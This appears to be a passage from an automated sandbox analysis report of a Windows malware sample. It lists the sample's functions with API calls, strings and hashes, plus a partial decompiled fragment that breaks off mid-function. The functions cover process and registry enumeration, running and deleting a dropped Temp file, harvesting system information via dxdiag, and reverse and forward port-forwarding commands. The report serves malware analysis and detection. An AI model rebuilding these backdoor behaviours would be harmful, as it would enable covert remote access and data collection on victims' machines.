                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                  • String ID:
                                  • API String ID: 819894693-0
                                  • Opcode ID: 1d7193b6688f9040ddf4de3a5326fa2c3a8462b65cc9de86db02c14405c27943
                                  • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                  • Opcode Fuzzy Hash: 1d7193b6688f9040ddf4de3a5326fa2c3a8462b65cc9de86db02c14405c27943
                                  • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BB20, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 191registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                  • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                  • _itoa.MSVCRT ref: 0040BC7E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                  • String ID: [regsplt]
                                  • API String ID: 2158026845-4262303796
                                  • Opcode ID: e88018d3548b0f6863b3603c9cd1a4df02fc79cc2db626b6e3283cfad48fe8a5
                                  • Instruction ID: 89d9bd96600c6e247975aaf8b0d3d97a5ae7f77b1b3f2a4fe7097baafbd20519
                                  • Opcode Fuzzy Hash: e88018d3548b0f6863b3603c9cd1a4df02fc79cc2db626b6e3283cfad48fe8a5
                                  • Instruction Fuzzy Hash: C971977290021EEBDB11DBD0DD89DEEBB7DEF48345F004166E606A2150EB745A89CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EFB5, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 120filesynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                  • getenv.MSVCRT ref: 0040EFDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                  • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                  • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID: <$@$Temp
                                  • API String ID: 2271834883-1032778388
                                  • Opcode ID: 8129fc4212b973579658f375ac4c783a4d8b919b9fc52074d37d9b0a98dc69ef
                                  • Instruction ID: 888aea03b1af4e5dcc25ad03cf8797eeef26072084273f227dd45585e2e759a8
                                  • Opcode Fuzzy Hash: 8129fc4212b973579658f375ac4c783a4d8b919b9fc52074d37d9b0a98dc69ef
                                  • Instruction Fuzzy Hash: E541407190061DEBDB10EFE0DC4AAEE7B79EF44701F10403AF502A6190DBB45A89CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E927, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 121sleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wgetenv.MSVCRT ref: 0040E93E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1966616101-2001430897
                                  • Opcode ID: cdea80f22b2708bd3dc1142172b254446cbced2225aa351ee3707a6bb4051a2b
                                  • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                  • Opcode Fuzzy Hash: cdea80f22b2708bd3dc1142172b254446cbced2225aa351ee3707a6bb4051a2b
                                  • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A370, Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                  • SetEvent.KERNEL32(?), ref: 0040A38C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040A3AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • inet_ntoa.WS2_32 ref: 0040A41B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                  • atoi.MSVCRT ref: 0040A435
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                  • atoi.MSVCRT ref: 0040A479
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@inet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                  • API String ID: 4095635200-168337528
                                  • Opcode ID: 9c6d9fadc52c293079f660d5c426c0b03e701870f787a23fd5a260a6c6d9362f
                                  • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                  • Opcode Fuzzy Hash: 9c6d9fadc52c293079f660d5c426c0b03e701870f787a23fd5a260a6c6d9362f
                                  • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040295E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 167windowmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				int _t29;
				void* _t35;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				intOrPtr _t95;
				void* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t107;

				_t107 = __eflags;
				_t95 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
				_t29 = SetEvent( *(_t95 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t104 = _t101 + 0x24;
				_t97 =  *_t29 - 0x3a;
				if(_t97 == 0) {
